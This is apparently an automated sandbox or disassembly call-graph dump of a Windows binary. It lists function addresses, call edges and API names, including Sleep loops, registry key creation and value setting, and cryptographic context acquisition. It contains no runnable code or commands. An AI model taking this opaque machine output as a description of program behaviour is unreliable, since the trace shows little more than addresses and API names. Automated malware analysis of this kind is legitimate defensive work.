41561->41563 41592 402460 41563->41592 41566 402460 43 API calls 41567 408807 41566->41567 41596 405a50 41567->41596 41572->41530 41573->41524 44073 4104df 41574->44073 41577 41066f 21 API calls __CreateFrameInfo 41577->41528 41578->41549 41579->41551 41580->41553 41582 40b587 41581->41582 41582->41556 41582->41582 41584 418176 41583->41584 41588 4181a8 41583->41588 41590 41299d 39 API calls 3 library calls 41584->41590 41586 418199 41591 417f78 49 API calls 3 library calls 41586->41591 41588->41560 41589->41560 41590->41586 41591->41588 41593 402483 41592->41593 41593->41593 41594 402760 43 API calls 41593->41594 41595 402495 41594->41595 41595->41566 42027 410822 GetSystemTimeAsFileTime 41596->42027 41598 405a9f 42029 4106e2 41598->42029 41601 402760 43 API calls 41606 405ada 41601->41606 41602 402760 43 API calls 41632 405ca0 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41602->41632 41603 405be6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41603->41602 41603->41632 41604 40cfef 39 API calls 41604->41632 41606->41603 43189 4025d0 41 API calls 41606->43189 41610 409b8a 41 API calls 41610->41632 41611 4061e5 42048 406c40 41611->42048 41613 40620c 41615 402460 43 API calls 41613->41615 41617 40621c 41615->41617 42058 402390 41617->42058 41621 406230 41622 406305 41621->41622 41623 406238 41621->41623 43227 406ee0 53 API calls 2 library calls 41622->43227 41627 4062a8 41623->41627 41628 40624b 41623->41628 41626 40630a 41634 402460 43 API calls 41626->41634 43222 406dd0 53 API calls 2 library calls 41627->43222 43217 406cc0 53 API calls 2 library calls 41628->43217 41629 4061b2 Sleep 41629->41632 41632->41604 41632->41610 41632->41611 41632->41629 41636 402760 43 API calls 41632->41636 41641 4061be 41632->41641 41652 406c2b 41632->41652 41653 4061a8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41632->41653 42032 4107f2 41632->42032 42036 403ab0 41632->42036 43190 4025d0 41 API calls 41632->43190 43191 409cc5 6 API calls 41632->43191 43192 409fd7 42 API calls 41632->43192 43193 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41632->43193 43194 409310 41632->43194 43199 401e50 41632->43199 41633 4062ad 41639 402460 43 API calls 41633->41639 41637 40631a 41634->41637 41635 406250 41638 402460 43 API calls 41635->41638 41636->41632 41643 402390 39 API calls 41637->41643 41640 406260 41638->41640 41642 4062bd 41639->41642 43218 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41640->43218 43215 408c50 43 API calls 41641->43215 43223 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41642->43223 41647 40632e 41643->41647 41648 406404 41647->41648 41649 406336 41647->41649 43236 407290 53 API calls 2 library calls 41648->43236 43228 406f60 53 API calls 2 library calls 41649->43228 41650 4061ca 41656 402390 39 API calls 41650->41656 41651 406269 41658 402390 39 API calls 41651->41658 43292 403c40 41652->43292 41653->41629 41654 4062c6 41660 402390 39 API calls 41654->41660 41662 4061d2 41656->41662 41664 406271 41658->41664 41666 4062ce 41660->41666 41661 40633b 41673 402460 43 API calls 41661->41673 41667 402390 39 API calls 41662->41667 41663 406409 41675 402460 43 API calls 41663->41675 43219 406d50 53 API calls 2 library calls 41664->43219 43224 406e60 53 API calls 2 library calls 41666->43224 41670 4061da 41667->41670 43216 401800 CoUninitialize 41670->43216 41671 406276 41680 402460 43 API calls 41671->41680 41672 4062d3 41678 402460 43 API calls 41672->41678 41676 40634b 41673->41676 41677 406419 41675->41677 43229 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41676->43229 41686 402390 39 API calls 41677->41686 41681 4062e3 41678->41681 41683 406286 41680->41683 43225 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41681->43225 41682 406354 41685 402390 39 API calls 41682->41685 43220 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41683->43220 41689 40635c 41685->41689 41690 40642d 41686->41690 41688 4062ec 41692 402390 39 API calls 41688->41692 43230 406ff0 53 API calls 2 library calls 41689->43230 41878 4064ee 41690->41878 43237 407310 53 API calls 2 library calls 41690->43237 41691 40628f 41694 402390 39 API calls 41691->41694 41698 4062f4 41692->41698 41696 406297 41694->41696 43221 408c50 43 API calls 41696->43221 43226 408c50 43 API calls 41698->43226 41699 406361 41704 402460 43 API calls 41699->41704 41700 40643a 41706 402460 43 API calls 41700->41706 41702 4064f8 41707 402460 43 API calls 41702->41707 41705 406371 41704->41705 43231 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41705->43231 41710 40644a 41706->41710 41711 406508 41707->41711 41708 40688e 42066 4017a0 41708->42066 43238 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41710->43238 41723 402390 39 API calls 41711->41723 41714 40637a 41718 402390 39 API calls 41714->41718 41716 4068a1 42070 4083f0 41716->42070 41721 406382 41718->41721 41719 406453 41722 402390 39 API calls 41719->41722 41720 4068aa 41729 402460 43 API calls 41720->41729 43232 407070 53 API calls 2 library calls 41721->43232 41725 40645b 41722->41725 41726 40651c 41723->41726 43239 407390 53 API calls 2 library calls 41725->43239 41952 406603 41726->41952 43246 4076b0 53 API calls 2 library calls 41726->43246 41727 406387 41737 402460 43 API calls 41727->41737 41733 4068bd 41729->41733 41731 406460 41740 402460 43 API calls 41731->41740 42080 408370 41733->42080 41734 40660d 41742 402460 43 API calls 41734->41742 41735 406529 41741 402460 43 API calls 41735->41741 41739 406397 41737->41739 41738 4068c8 41749 402460 43 API calls 41738->41749 41750 402390 39 API calls 41739->41750 41743 406470 41740->41743 41745 406539 41741->41745 41746 40661d 41742->41746 43240 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41743->43240 43247 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41745->43247 41755 402390 39 API calls 41746->41755 41747 406479 41751 402390 39 API calls 41747->41751 41753 4068db 41749->41753 41754 4063ab 41750->41754 41756 406481 41751->41756 41752 406542 41757 402390 39 API calls 41752->41757 42090 4082d0 41753->42090 41759 4063cc 41754->41759 41760 4063af 41754->41760 41762 406631 41755->41762 43241 407410 53 API calls 2 library calls 41756->43241 41764 40654a 41757->41764 43234 407180 53 API calls 2 library calls 41759->43234 43233 407100 53 API calls 2 library calls 41760->43233 41767 4066b3 41762->41767 41768 406635 41762->41768 43248 407730 53 API calls 2 library calls 41764->43248 41766 4068e6 41775 402460 43 API calls 41766->41775 43263 407c70 53 API calls 2 library calls 41767->43263 43257 407ae0 53 API calls 2 library calls 41768->43257 41769 406486 41781 402460 43 API calls 41769->41781 41771 4063d1 41782 402460 43 API calls 41771->41782 41774 40654f 41784 402460 43 API calls 41774->41784 41779 4068f9 41775->41779 41776 4063b4 41780 402460 43 API calls 41776->41780 41777 4066b8 41787 402460 43 API calls 41777->41787 41778 40663a 41788 402460 43 API calls 41778->41788 42100 408da0 41779->42100 41786 4063c4 41780->41786 41789 406496 41781->41789 41791 4063e1 41782->41791 41790 40655f 41784->41790 43282 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41786->43282 41794 4066c8 41787->41794 41795 40664a 41788->41795 41800 402390 39 API calls 41789->41800 43249 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41790->43249 41802 402390 39 API calls 41791->41802 41810 402390 39 API calls 41794->41810 43258 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41795->43258 41797 406926 42108 408eb0 41797->42108 41798 406875 41805 402390 39 API calls 41798->41805 41909 4062a3 41798->41909 41807 4064aa 41800->41807 41801 406568 41808 402390 39 API calls 41801->41808 41803 4063f5 41802->41803 41803->41909 43235 407210 53 API calls 2 library calls 41803->43235 41805->41909 41806 406653 41811 402390 39 API calls 41806->41811 41812 4064b8 41807->41812 41813 4064ae 41807->41813 41814 406570 41808->41814 41819 4066dc 41810->41819 41820 40665b 41811->41820 43243 407520 53 API calls 2 library calls 41812->43243 43242 4074a0 53 API calls 2 library calls 41813->43242 43250 4077b0 53 API calls 2 library calls 41814->43250 41818 408e00 43 API calls 41824 406953 41818->41824 41825 4066e0 41819->41825 41826 40675e 41819->41826 43259 407b60 53 API calls 2 library calls 41820->43259 41822 406575 41835 402460 43 API calls 41822->41835 41823 4064bd 41836 402460 43 API calls 41823->41836 41828 408eb0 43 API calls 41824->41828 43264 407d00 53 API calls 2 library calls 41825->43264 43270 407e80 53 API calls 2 library calls 41826->43270 41832 406968 41828->41832 41831 406660 41838 402460 43 API calls 41831->41838 41837 408e00 43 API calls 41832->41837 41833 406763 41842 402460 43 API calls 41833->41842 41834 4066e5 41843 402460 43 API calls 41834->41843 41839 406585 41835->41839 41840 4064cd 41836->41840 41841 406980 41837->41841 41844 406670 41838->41844 43251 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41839->43251 41856 402390 39 API calls 41840->41856 41846 402390 39 API calls 41841->41846 41847 406773 41842->41847 41848 4066f5 41843->41848 43260 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41844->43260 41851 40698e 41846->41851 41863 402390 39 API calls 41847->41863 43265 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41848->43265 41850 40658e 41855 402390 39 API calls 41850->41855 41852 402390 39 API calls 41851->41852 41857 406999 41852->41857 41854 406679 41859 402390 39 API calls 41854->41859 41860 406596 41855->41860 41861 4064e1 41856->41861 41862 402390 39 API calls 41857->41862 41858 4066fe 41864 402390 39 API calls 41858->41864 41865 406681 41859->41865 43252 407830 53 API calls 2 library calls 41860->43252 41861->41909 43244 4075b0 53 API calls 2 library calls 41861->43244 41867 4069a4 41862->41867 41868 406787 41863->41868 41869 406706 41864->41869 43261 407bf0 53 API calls 2 library calls 41865->43261 41873 402390 39 API calls 41867->41873 41874 40678b 41868->41874 41875 4067de 41868->41875 43266 407d80 53 API calls 2 library calls 41869->43266 41871 40659b 41885 402460 43 API calls 41871->41885 41879 4069af 41873->41879 43271 407f10 53 API calls 2 library calls 41874->43271 43276 4080d0 53 API calls 2 library calls 41875->43276 41877 406686 41888 402460 43 API calls 41877->41888 43245 407630 53 API calls 2 library calls 41878->43245 41883 402390 39 API calls 41879->41883 41881 40670b 41891 402460 43 API calls 41881->41891 41887 4069ba 41883->41887 41884 406790 41895 402460 43 API calls 41884->41895 41889 4065ab 41885->41889 41886 4067e3 41893 402460 43 API calls 41886->41893 41890 402390 39 API calls 41887->41890 41892 406696 41888->41892 41898 402390 39 API calls 41889->41898 41894 4069c5 41890->41894 41896 40671b 41891->41896 43262 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41892->43262 41899 4067f3 41893->41899 41900 402390 39 API calls 41894->41900 41901 4067a0 41895->41901 43267 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41896->43267 41904 4065bf 41898->41904 41916 402390 39 API calls 41899->41916 41905 4069d0 41900->41905 43272 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41901->43272 41903 40669f 41908 402390 39 API calls 41903->41908 41910 4065c8 41904->41910 43253 4078c0 53 API calls 2 library calls 41904->43253 41911 402390 39 API calls 41905->41911 41907 406724 41913 402390 39 API calls 41907->41913 41908->41909 41909->41708 43283 402360 43 API calls 41909->43283 43254 407940 53 API calls 2 library calls 41910->43254 41955 4069df 41911->41955 41912 4067a9 41918 402390 39 API calls 41912->41918 41914 40672c 41913->41914 43268 407e00 53 API calls 2 library calls 41914->43268 41921 406807 41916->41921 41919 4067b1 41918->41919 43273 407fd0 53 API calls 2 library calls 41919->43273 41921->41909 43277 408150 53 API calls 2 library calls 41921->43277 41922 4065d2 41928 402460 43 API calls 41922->41928 41924 406731 41929 402460 43 API calls 41924->41929 41925 4067b6 41932 402460 43 API calls 41925->41932 41927 406810 41936 402460 43 API calls 41927->41936 41930 4065e2 41928->41930 41933 406741 41929->41933 41937 402390 39 API calls 41930->41937 41931 406a3e Sleep 41931->41955 41934 4067c6 41932->41934 43269 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41933->43269 43274 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41934->43274 41940 406820 41936->41940 41941 4065f6 41937->41941 41939 40674a 41944 402390 39 API calls 41939->41944 43278 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41940->43278 41941->41909 43255 4079d0 53 API calls 2 library calls 41941->43255 41942 402460 43 API calls 41942->41955 41943 4067cf 41947 402390 39 API calls 41943->41947 41944->41909 41946 406829 41948 402390 39 API calls 41946->41948 41950 4067d7 41947->41950 41951 406831 41948->41951 43275 408050 53 API calls 2 library calls 41950->43275 43279 4081d0 53 API calls 2 library calls 41951->43279 43256 407a50 53 API calls 2 library calls 41952->43256 41955->41931 41955->41942 41956 406a47 41955->41956 41962 406a36 41955->41962 41957 402390 39 API calls 41956->41957 41959 406a4f 41957->41959 41958 406836 41965 402460 43 API calls 41958->41965 42111 408c80 41959->42111 41960 4067dc 41963 402460 43 API calls 41960->41963 41966 402390 39 API calls 41962->41966 41963->41786 41964 406a60 41967 408c80 43 API calls 41964->41967 41968 406846 41965->41968 41966->41931 41969 406a79 41967->41969 43280 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41968->43280 41971 408c80 43 API calls 41969->41971 41973 406a8c 41971->41973 41972 40684f 41974 402390 39 API calls 41972->41974 42128 404f70 41973->42128 41976 406857 41974->41976 43281 408250 53 API calls 2 library calls 41976->43281 41977 406aa1 41979 406ac1 41977->41979 41981 408c80 43 API calls 41977->41981 43284 408480 53 API calls 2 library calls 41979->43284 41983 406abc 41981->41983 41982 406ac9 41985 402460 43 API calls 41982->41985 42611 403d40 41983->42611 41986 406ad9 41985->41986 41987 402390 39 API calls 41986->41987 41988 406aed 41987->41988 41989 406b90 41988->41989 41991 4017a0 41 API calls 41988->41991 43287 4085f0 53 API calls 2 library calls 41989->43287 41993 406b08 41991->41993 41992 406b95 41996 402460 43 API calls 41992->41996 43285 408510 53 API calls 2 library calls 41993->43285 41995 406b11 41998 402460 43 API calls 41995->41998 41997 406ba8 41996->41997 41999 402390 39 API calls 41997->41999 42002 406b21 41998->42002 42000 406bbf 41999->42000 42000->41652 42001 406bc3 42000->42001 43288 408760 53 API calls 2 library calls 42001->43288 42005 406b57 42002->42005 42006 406b48 Sleep 42002->42006 42004 406bd0 42008 402460 43 API calls 42004->42008 42012 402460 43 API calls 42005->42012 42006->42002 42007 406b55 42006->42007 42009 406b79 42007->42009 42011 406bdf 42008->42011 42010 402390 39 API calls 42009->42010 42013 406b81 42010->42013 43289 4086e0 53 API calls 2 library calls 42011->43289 42015 406b6e 42012->42015 43286 401800 CoUninitialize 42013->43286 42016 402390 39 API calls 42015->42016 42016->42009 42018 406bf3 42019 402460 43 API calls 42018->42019 42020 406c02 42019->42020 43290 408680 53 API calls __Init_thread_footer 42020->43290 42022 406c10 42023 402460 43 API calls 42022->42023 42024 406c1f 42023->42024 43291 4058f0 247 API calls 5 library calls 42024->43291 42026 406c28 42026->41652 42028 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 42027->42028 42028->41598 43295 4128e2 GetLastError 42029->43295 42033 41080a 42032->42033 42034 410800 42032->42034 42033->41632 43339 4106f4 43 API calls 2 library calls 42034->43339 42047 403af1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42036->42047 42037 408c80 43 API calls 42037->42047 42039 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42040 403c33 42039->42040 42040->41632 42041 403b8d 42042 403bd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42041->42042 42043 403c37 42041->42043 42042->42039 42045 40cfef 39 API calls 42043->42045 42044 403b75 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42044->42042 42044->42043 43340 408f80 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42044->43340 42046 403c3c 42045->42046 42047->42037 42047->42043 42047->42044 42049 406c9e 42048->42049 42050 406c6c 42048->42050 42052 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42049->42052 43341 409cc5 6 API calls 42050->43341 42054 406cb0 42052->42054 42053 406c76 42053->42049 43342 409fd7 42 API calls 42053->43342 42054->41613 42056 406c94 43343 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42056->43343 42059 40239b 42058->42059 42060 4023b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42058->42060 42059->42060 42061 40cfef 39 API calls 42059->42061 42060->41621 42062 4023da 42061->42062 42063 402411 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42062->42063 42064 40cfef 39 API calls 42062->42064 42063->41621 42065 40245c 42064->42065 42067 4017b3 __CreateFrameInfo 42066->42067 42068 409b8a 41 API calls 42067->42068 42069 4017ca __CreateFrameInfo 42068->42069 42069->41716 42071 408422 42070->42071 42079 40845e 42070->42079 43344 409cc5 6 API calls 42071->43344 42073 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42075 408470 42073->42075 42074 40842c 42074->42079 43345 409fd7 42 API calls 42074->43345 42075->41720 42077 408454 43346 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42077->43346 42079->42073 42081 4083ce 42080->42081 42082 40839c 42080->42082 42083 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42081->42083 43347 409cc5 6 API calls 42082->43347 42085 4083e0 42083->42085 42085->41738 42086 4083a6 42086->42081 43348 409fd7 42 API calls 42086->43348 42088 4083c4 43349 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42088->43349 42091 40830d 42090->42091 42099 408352 42090->42099 43350 409cc5 6 API calls 42091->43350 42093 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42094 408365 42093->42094 42094->41766 42095 408317 42095->42099 43351 409fd7 42 API calls 42095->43351 42097 408348 43352 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42097->43352 42099->42093 42101 408db4 42100->42101 42102 409310 43 API calls 42101->42102 42103 40690e 42102->42103 42104 408e00 42103->42104 42105 408e1b 42104->42105 42107 408e2f __InternalCxxFrameHandler 42105->42107 43353 402840 43 API calls 3 library calls 42105->43353 42107->41797 43354 409130 42108->43354 42110 40693b 42110->41818 42112 408caa 42111->42112 42113 408d6d 42112->42113 42117 408cbe 42112->42117 43377 401600 43 API calls 3 library calls 42113->43377 42115 408cca __InternalCxxFrameHandler 42115->41964 42116 408d72 43378 401560 41 API calls 3 library calls 42116->43378 42117->42115 42119 408d18 42117->42119 42120 408d39 42117->42120 42119->42116 42122 408d1f 42119->42122 42127 408d2e __InternalCxxFrameHandler 42120->42127 43376 401560 41 API calls 4 library calls 42120->43376 42121 408d25 42123 40cfef 39 API calls 42121->42123 42121->42127 43375 401560 41 API calls 4 library calls 42122->43375 42125 408d7c 42123->42125 42127->41964 42129 410822 GetSystemTimeAsFileTime 42128->42129 42130 404fbf 42129->42130 42131 4106e2 39 API calls 42130->42131 42132 404fc8 __CreateFrameInfo 42131->42132 42133 409b8a 41 API calls 42132->42133 42140 40501c __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42133->42140 42135 402760 43 API calls 42135->42140 42138 409310 43 API calls 42138->42140 42139 401e50 44 API calls 42139->42140 42140->42135 42140->42138 42140->42139 42141 4058dd 42140->42141 42142 4052f0 Sleep 42140->42142 42148 405300 __CreateFrameInfo 42140->42148 43379 4024a0 42140->43379 43520 409cc5 6 API calls 42140->43520 43521 409fd7 42 API calls 42140->43521 43522 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42140->43522 42143 40cfef 39 API calls 42141->42143 42142->42140 42144 4058e2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 42143->42144 42147 405984 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42144->42147 42149 405a2a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42147->42149 42150 405a42 42147->42150 42155 409b8a 41 API calls 42148->42155 42152 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42149->42152 42151 40cfef 39 API calls 42150->42151 42153 405a47 42151->42153 42154 405a3e 42152->42154 42156 410822 GetSystemTimeAsFileTime 42153->42156 42154->41977 42186 405335 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42155->42186 42157 405a9f 42156->42157 42158 4106e2 39 API calls 42157->42158 42159 405aa8 Sleep 42158->42159 42160 402760 43 API calls 42159->42160 42171 405ada 42160->42171 42163 402760 43 API calls 42212 405ca0 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42163->42212 42164 402760 43 API calls 42164->42186 42165 405be6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42165->42163 42165->42212 42166 40cfef 39 API calls 42166->42212 42169 409310 43 API calls 42169->42186 42170 401e50 44 API calls 42170->42186 42171->42165 43526 4025d0 41 API calls 42171->43526 42173 403ab0 43 API calls 42173->42212 42174 4107f2 43 API calls 42174->42212 42175 40fb4d 15 API calls ___std_exception_copy 42175->42186 42176 409b8a 41 API calls 42176->42212 42177 4056a2 42178 40579c CoUninitialize 42177->42178 42185 4057b2 42178->42185 42179 4061e5 42180 406c40 53 API calls 42179->42180 42181 40620c 42180->42181 42187 402460 43 API calls 42181->42187 42183 408c80 43 API calls 42183->42186 42192 4057ce CoUninitialize 42185->42192 42186->42141 42186->42164 42186->42169 42186->42170 42186->42175 42186->42177 42186->42183 42210 403430 41 API calls 42186->42210 42239 4056a7 42186->42239 43394 4035d0 CryptAcquireContextW 42186->43394 43418 402ee0 42186->43418 43523 409cc5 6 API calls 42186->43523 43524 409fd7 42 API calls 42186->43524 43525 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42186->43525 42191 40621c 42187->42191 42189 402760 43 API calls 42189->42212 42195 402390 39 API calls 42191->42195 42201 4057db std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42192->42201 42194 409310 43 API calls 42194->42212 42196 406230 42195->42196 42199 406305 42196->42199 42200 406238 42196->42200 42197 4058b5 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42198 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42197->42198 42202 4058d6 42198->42202 43543 406ee0 53 API calls 2 library calls 42199->43543 42206 4062a8 42200->42206 42207 40624b 42200->42207 42201->42141 42201->42197 42202->41977 42204 401e50 44 API calls 42204->42212 42205 40630a 42214 402460 43 API calls 42205->42214 43538 406dd0 53 API calls 2 library calls 42206->43538 43533 406cc0 53 API calls 2 library calls 42207->43533 42208 4061b2 Sleep 42208->42212 42210->42186 42212->42166 42212->42173 42212->42174 42212->42176 42212->42179 42212->42189 42212->42194 42212->42204 42212->42208 42220 4061be 42212->42220 42231 406c2b 42212->42231 42232 4061a8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42212->42232 43527 4025d0 41 API calls 42212->43527 43528 409cc5 6 API calls 42212->43528 43529 409fd7 42 API calls 42212->43529 43530 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42212->43530 42213 4062ad 42218 402460 43 API calls 42213->42218 42216 40631a 42214->42216 42215 406250 42217 402460 43 API calls 42215->42217 42222 402390 39 API calls 42216->42222 42219 406260 42217->42219 42221 4062bd 42218->42221 43534 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42219->43534 43531 408c50 43 API calls 42220->43531 43539 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42221->43539 42226 40632e 42222->42226 42227 406404 42226->42227 42228 406336 42226->42228 43552 407290 53 API calls 2 library calls 42227->43552 43544 406f60 53 API calls 2 library calls 42228->43544 42229 4061ca 42235 402390 39 API calls 42229->42235 42230 406269 42237 402390 39 API calls 42230->42237 42238 403c40 21 API calls 42231->42238 42232->42208 42233 4062c6 42240 402390 39 API calls 42233->42240 42242 4061d2 42235->42242 42244 406271 42237->42244 42245 406c30 42238->42245 42246 40573b Sleep 42239->42246 42253 40576a Sleep 42239->42253 43474 100010a3 42239->43474 43477 10001f20 42239->43477 42247 4062ce 42240->42247 42241 40633b 42255 402460 43 API calls 42241->42255 42248 402390 39 API calls 42242->42248 42243 406409 42257 402460 43 API calls 42243->42257 43535 406d50 53 API calls 2 library calls 42244->43535 42246->42177 42246->42239 43540 406e60 53 API calls 2 library calls 42247->43540 42251 4061da 42248->42251 43532 401800 CoUninitialize 42251->43532 42252 406276 42262 402460 43 API calls 42252->42262 42253->42177 42254 4062d3 42260 402460 43 API calls 42254->42260 42258 40634b 42255->42258 42259 406419 42257->42259 43545 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42258->43545 42268 402390 39 API calls 42259->42268 42263 4062e3 42260->42263 42265 406286 42262->42265 43541 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42263->43541 42264 406354 42267 402390 39 API calls 42264->42267 43536 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42265->43536 42271 40635c 42267->42271 42272 40642d 42268->42272 42270 4062ec 42274 402390 39 API calls 42270->42274 43546 406ff0 53 API calls 2 library calls 42271->43546 42276 4064ee 42272->42276 43553 407310 53 API calls 2 library calls 42272->43553 42273 40628f 42277 402390 39 API calls 42273->42277 42281 4062f4 42274->42281 43561 407630 53 API calls 2 library calls 42276->43561 42279 406297 42277->42279 43537 408c50 43 API calls 42279->43537 43542 408c50 43 API calls 42281->43542 42282 406361 42288 402460 43 API calls 42282->42288 42283 40643a 42290 402460 43 API calls 42283->42290 42285 4064f8 42291 402460 43 API calls 42285->42291 42287 4062a3 42292 40688e 42287->42292 43599 402360 43 API calls 42287->43599 42289 406371 42288->42289 43547 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42289->43547 42294 40644a 42290->42294 42295 406508 42291->42295 42297 4017a0 41 API calls 42292->42297 43554 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42294->43554 42307 402390 39 API calls 42295->42307 42300 4068a1 42297->42300 42298 40637a 42302 402390 39 API calls 42298->42302 42301 4083f0 53 API calls 42300->42301 42304 4068aa 42301->42304 42305 406382 42302->42305 42303 406453 42306 402390 39 API calls 42303->42306 42314 402460 43 API calls 42304->42314 43548 407070 53 API calls 2 library calls 42305->43548 42309 40645b 42306->42309 42310 40651c 42307->42310 43555 407390 53 API calls 2 library calls 42309->43555 42313 406603 42310->42313 43562 4076b0 53 API calls 2 library calls 42310->43562 42311 406387 42322 402460 43 API calls 42311->42322 43572 407a50 53 API calls 2 library calls 42313->43572 42318 4068bd 42314->42318 42316 406460 42325 402460 43 API calls 42316->42325 42321 408370 53 API calls 42318->42321 42319 40660d 42327 402460 43 API calls 42319->42327 42320 406529 42326 402460 43 API calls 42320->42326 42323 4068c8 42321->42323 42324 406397 42322->42324 42334 402460 43 API calls 42323->42334 42335 402390 39 API calls 42324->42335 42328 406470 42325->42328 42330 406539 42326->42330 42331 40661d 42327->42331 43556 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42328->43556 43563 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42330->43563 42340 402390 39 API calls 42331->42340 42332 406479 42336 402390 39 API calls 42332->42336 42338 4068db 42334->42338 42339 4063ab 42335->42339 42341 406481 42336->42341 42337 406542 42342 402390 39 API calls 42337->42342 42343 4082d0 53 API calls 42338->42343 42344 4063cc 42339->42344 42345 4063af 42339->42345 42347 406631 42340->42347 43557 407410 53 API calls 2 library calls 42341->43557 42349 40654a 42342->42349 42351 4068e6 42343->42351 43550 407180 53 API calls 2 library calls 42344->43550 43549 407100 53 API calls 2 library calls 42345->43549 42353 4066b3 42347->42353 42354 406635 42347->42354 43564 407730 53 API calls 2 library calls 42349->43564 42361 402460 43 API calls 42351->42361 42352 4063b4 42365 402460 43 API calls 42352->42365 43579 407c70 53 API calls 2 library calls 42353->43579 43573 407ae0 53 API calls 2 library calls 42354->43573 42355 406486 42366 402460 43 API calls 42355->42366 42357 4063d1 42367 402460 43 API calls 42357->42367 42360 40654f 42371 402460 43 API calls 42360->42371 42364 4068f9 42361->42364 42362 4066b8 42374 402460 43 API calls 42362->42374 42363 40663a 42375 402460 43 API calls 42363->42375 42368 408da0 43 API calls 42364->42368 42369 4063c4 42365->42369 42370 406496 42366->42370 42372 4063e1 